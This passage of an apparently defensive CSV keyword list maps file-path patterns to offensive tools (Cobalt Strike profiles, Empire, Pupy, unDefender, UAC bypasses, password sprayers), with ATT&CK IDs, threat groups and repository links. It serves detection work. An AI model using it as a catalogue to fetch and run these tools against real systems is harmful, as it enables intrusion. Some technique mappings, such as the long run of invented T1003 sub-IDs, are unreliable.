T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/Tools/spoolsystem/*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/Tools/Squeak/Squeak*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/Tool-X.git*","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/Tool-X","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/top_mots_combo.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*/top-usernames-shortlist.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/tor-0.*.tar.gz*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/tor-consensus-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/tor-gencert.exe*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" +"*/traceroute-geolocation.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/tracers_fuzzer.cc*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*/trackerjacker*","offensive_tool_keyword","trackerjacker","Like nmap for mapping wifi networks you're not connected to. Maps and tracks wifi networks and devices through raw 802.11 monitoring.","T1040 - T1018 - T1591","TA0007 - - TA0043","N/A","N/A","Information Gathering","https://github.com/calebmadrigal/trackerjacker","1","0","N/A","N/A","10","2537","190","2020-12-24T20:53:31Z","2016-12-18T22:01:13Z" +"*/Trackflaw/CVE*.py*","offensive_tool_keyword","poc","Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client.","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear","Exploitation tools","https://github.com/Trackflaw/CVE-2023-23397","1","1","N/A","N/A","1","99","24","2023-03-24T10:46:38Z","2023-03-20T16:31:54Z" +"*/transports/scramblesuit/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/trap_command.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/TreeWalker.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/TREVORspray.git*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*/trevorspray.log*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*/trganda/CVE-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z" +"*/trick_ryuk.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/trickbot.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/tried_logins.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*/TriggerLinux/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/trollsploit/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1154","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/TROUBLE-1/Vajra*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/trusted_sec_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/trusted_sec_remote_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/trustedsec/*","offensive_tool_keyword","Github Username","github repo hosting various exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/trustedsec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/tso-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/tso-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/tweetshell.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*/twittor.git*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*/uac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/UACBypasses/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/UACME.git*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*/UAC-SilentClean/*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*/uberfile.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/ubiquiti-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/udmp-parser.git*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" +"*/umeshshinde19/instainsane*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","5","473","329","2023-08-22T21:49:22Z","2018-12-02T22:48:11Z" +"*/unDefender.exe*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" +"*/unDefender.git*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" +"*/undertheradar.git*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*/unhook-bof*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" +"*/unhook-bof*","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/unhook-bof","1","1","N/A","10","10","240","61","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z" +"*/unhook-bof*","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/unhook-bof","1","1","N/A","10","10","51","14","2022-03-13T15:57:10Z","2021-07-02T14:55:38Z" 